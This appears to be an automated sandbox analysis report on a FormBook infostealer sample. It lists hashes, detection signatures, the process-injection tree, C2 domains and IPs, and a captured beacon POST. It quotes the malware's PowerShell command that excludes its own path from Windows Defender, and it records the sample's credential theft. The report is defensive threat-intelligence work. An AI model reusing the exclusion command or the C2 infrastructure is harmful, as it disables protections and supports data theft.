Windows Analysis Report
PO23100072.exe

Overview

General Information

Sample name: PO23100072.exe
Analysis ID: 1517921
MD5: b2a43d44c753d573caeb9160cb1da4a2
SHA1: 873200a52f2bfd05cf5b708d87f8179486464fab
SHA256: 405f4016376e02c97d8509d2627c7bb3be0583f46aa5a1ea57d96252b759f1f9
Tags: exe, Formbook, user-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Uncommon Userinit Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Userinit Child Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO23100072.exe (PID: 1788 cmdline: "C:\Users\user\Desktop\PO23100072.exe" MD5: B2A43D44C753D573CAEB9160CB1DA4A2)
    • powershell.exe (PID: 3456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1912 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • PO23100072.exe (PID: 3552 cmdline: "C:\Users\user\Desktop\PO23100072.exe" MD5: B2A43D44C753D573CAEB9160CB1DA4A2)
    • PO23100072.exe (PID: 6136 cmdline: "C:\Users\user\Desktop\PO23100072.exe" MD5: B2A43D44C753D573CAEB9160CB1DA4A2)
      • FrMKpuEiehQ.exe (PID: 6560 cmdline: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • userinit.exe (PID: 6840 cmdline: "C:\Windows\SysWOW64\userinit.exe" MD5: 24892AC6E39679E3BD3B0154DE97C53A)
          • FrMKpuEiehQ.exe (PID: 6192 cmdline: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5600 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2be20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2be20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.PO23100072.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.PO23100072.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2eff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.PO23100072.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.PO23100072.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100072.exe", ParentImage: C:\Users\user\Desktop\PO23100072.exe, ParentProcessId: 1788, ParentProcessName: PO23100072.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", ProcessId: 3456, ProcessName: powershell.exe
            Source: Process startedAuthor: Tom Ueltschi (@c_APT_ure), Tim Shelton: Data: Command: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , CommandLine: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, NewProcessName: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, OriginalFileName: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, ParentCommandLine: "C:\Windows\SysWOW64\userinit.exe", ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 6840, ParentProcessName: userinit.exe, ProcessCommandLine: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , ProcessId: 6192, ProcessName: FrMKpuEiehQ.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Samir Bousseaden (idea): Data: Command: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , CommandLine: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, NewProcessName: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, OriginalFileName: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, ParentCommandLine: "C:\Windows\SysWOW64\userinit.exe", ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 6840, ParentProcessName: userinit.exe, ProcessCommandLine: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , ProcessId: 6192, ProcessName: FrMKpuEiehQ.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100072.exe", ParentImage: C:\Users\user\Desktop\PO23100072.exe, ParentProcessId: 1788, ParentProcessName: PO23100072.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", ProcessId: 3456, ProcessName: powershell.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-25T09:16:01.206157+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49712 | 188.114.96.3 | 80 | TCP
            2024-09-25T09:16:24.413193+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49717 | 199.59.243.227 | 80 | TCP
            2024-09-25T09:16:37.932974+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49722 | 198.252.106.191 | 80 | TCP
            2024-09-25T09:16:51.106407+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49727 | 3.33.130.190 | 80 | TCP
            2024-09-25T09:17:04.515185+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49731 | 148.251.114.233 | 80 | TCP
            2024-09-25T09:17:17.913750+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49735 | 209.74.95.29 | 80 | TCP
            2024-09-25T09:17:31.111467+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49739 | 199.59.243.227 | 80 | TCP
            2024-09-25T09:17:44.301084+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49743 | 3.33.130.190 | 80 | TCP
            2024-09-25T09:18:05.939548+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49747 | 52.223.13.41 | 80 | TCP
            2024-09-25T09:18:19.934267+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49751 | 38.47.232.144 | 80 | TCP
            2024-09-25T09:18:33.704910+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49755 | 52.230.28.86 | 80 | TCP
            2024-09-25T09:18:48.608515+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49759 | 133.130.35.90 | 80 | TCP
            2024-09-25T09:19:02.055491+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49763 | 52.223.13.41 | 80 | TCP
            2024-09-25T09:19:15.269086+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49767 | 84.32.84.32 | 80 | TCP

            AV Detection

            Source: PO23100072.exe, ReversingLabs: Detection: 52%
            Source: Yara match, File source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: PO23100072.exe, Joe Sandbox ML: detected
            Source: PO23100072.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO23100072.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FrMKpuEiehQ.exe, 00000007.00000002.3904795319.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730386848.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO23100072.exe, 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1666001487.0000000003559000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1660307921.00000000033A1000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ZlbU.pdb source: PO23100072.exe
            Source: Binary string: wntdll.pdb source: PO23100072.exe, PO23100072.exe, 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, userinit.exe, 00000009.00000003.1666001487.0000000003559000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1660307921.00000000033A1000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: userinit.pdb source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905365390.00000000011E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ZlbU.pdbSHA256X{_ source: PO23100072.exe
            Source: Binary string: userinit.pdbGCTL source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905365390.00000000011E8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_0301C290 FindFirstFileW,FindNextFileW,FindClose (9_2_0301C290)
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 4x nop then xor eax, eax (9_2_03009B50)
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 4x nop then mov ebx, 00000004h (9_2_03A504DE)

            Networking

            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49731 -> 148.251.114.233:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49722 -> 198.252.106.191:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49735 -> 209.74.95.29:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49759 -> 133.130.35.90:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49755 -> 52.230.28.86:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49739 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49751 -> 38.47.232.144:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49767 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49727 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49763 -> 52.223.13.41:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49743 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49747 -> 52.223.13.41:80
            Source: DNS query: www.suarahati20.xyz
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
            Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: HAWKHOSTCA HAWKHOSTCA
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic, DNS traffic detected: DNS query: www.asstl.online
            Source: global traffic, DNS traffic detected: DNS query: www.cc101.pro
            Source: global traffic, DNS traffic detected: DNS query: www.popin.space
            Source: global traffic, DNS traffic detected: DNS query: www.suarahati20.xyz
            Source: global traffic, DNS traffic detected: DNS query: www.dhkatp.vip
            Source: global traffic, DNS traffic detected: DNS query: www.eslameldaramlly.site
            Source: global traffic, DNS traffic detected: DNS query: www.pofgof.pro
            Source: global traffic, DNS traffic detected: DNS query: www.donante-de-ovulos.biz
            Source: global traffic, DNS traffic detected: DNS query: www.airtech365.net
            Source: global traffic, DNS traffic detected: DNS query: www.bonusgame2024.online
            Source: global traffic, DNS traffic detected: DNS query: www.longfilsalphonse.net
            Source: global traffic, DNS traffic detected: DNS query: www.yu35n.top
            Source: global traffic, DNS traffic detected: DNS query: www.52ywq.vip
            Source: global traffic, DNS traffic detected: DNS query: www.komart.shop
            Source: global traffic, DNS traffic detected: DNS query: www.timetime.store
            Source: global traffic, DNS traffic detected: DNS query: www.agilizeimob.app
            Source: unknownHTTP traffic detected: POST /x7gz/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.popin.spaceOrigin: http://www.popin.spaceReferer: http://www.popin.space/x7gz/Content-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36Data Raw: 55 78 5f 54 50 46 6f 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 74 79 50 63 32 30 6f 6c 39 4c 68 52 2f 58 30 30 66 46 6d 38 42 67 7a 36 56 57 61 7a 7a 69 2b 4a 6f 63 41 59 4e 76 79 73 77 4e 4e 67 74 34 67 77 44 79 52 5a 4c 6c 76 67 37 33 70 35 38 6b 6a 75 63 68 57 6a 63 49 35 58 61 41 72 55 44 59 77 74 42 58 31 6d 45 63 42 78 4e 53 59 6c 33 79 36 66 68 4a 68 63 78 6e 7a 66 5a 72 62 31 6f 5a 44 30 51 50 50 62 48 4b 34 49 51 48 59 46 78 63 39 47 6d 32 71 44 6b 45 30 33 52 71 48 57 36 6e 4f 61 44 51 43 72 68 75 52 58 68 78 6b 74 44 54 67 77 48 77 39 6d 77 37 43 30 4b 34 6f 4d 4b 73 72 47 62 76 71 59 79 69 62 37 65 58 77 3d Data Ascii: Ux_TPFo=f07BeQ/6F/4ytyPc20ol9LhR/X00fFm8Bgz6VWazzi+JocAYNvyswNNgt4gwDyRZLlvg73p58kjuchWjcI5XaArUDYwtBX1mEcBxNSYl3y6fhJhcxnzfZrb1oZD0QPPbHK4IQHYFxc9Gm2qDkE03RqHW6nOaDQCrhuRXhxktDTgwHw9mw7C0K4oMKsrGbvqYyib7eXw=
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 07:16:30 GMT | server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 07:16:32 GMT | server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 07:16:35 GMT | server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 07:16:37 GMT | server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Wed, 25 Sep 2024 07:16:56 GMT | server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Wed, 25 Sep 2024 07:16:59 GMT | server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Wed, 25 Sep 2024 07:17:01 GMT | server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Wed, 25 Sep 2024 07:17:04 GMT | server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 07:17:10 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 13928 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 07:17:12 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 13928 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 07:17:15 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 13928 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 07:17:17 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 13928 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 07:18:12 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66ea4ae9-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 07:18:14 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66ea4ae9-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 07:18:17 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66ea4ae9-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 07:18:19 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66ea4ae9-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-encoding: gzip | content-type: text/html | date: Wed, 25 Sep 2024 07:18:40 GMT | etag: W/"66d6a4ca-2b5" | server: nginx | vary: Accept-Encoding | content-length: 454 | connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-encoding: gzip | content-type: text/html | date: Wed, 25 Sep 2024 07:18:43 GMT | etag: W/"66d6a4ca-2b5" | server: nginx | vary: Accept-Encoding | content-length: 454 | connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-encoding: gzip | content-type: text/html | date: Wed, 25 Sep 2024 07:18:45 GMT | etag: W/"66d6a4ca-2b5" | server: nginx | vary: Accept-Encoding | content-length: 454 | connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Wed, 25 Sep 2024 07:18:48 GMT | etag: W/"66d6a4ca-2b5" | server: nginx | vary: Accept-Encoding | content-length: 693 | connection: close | Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
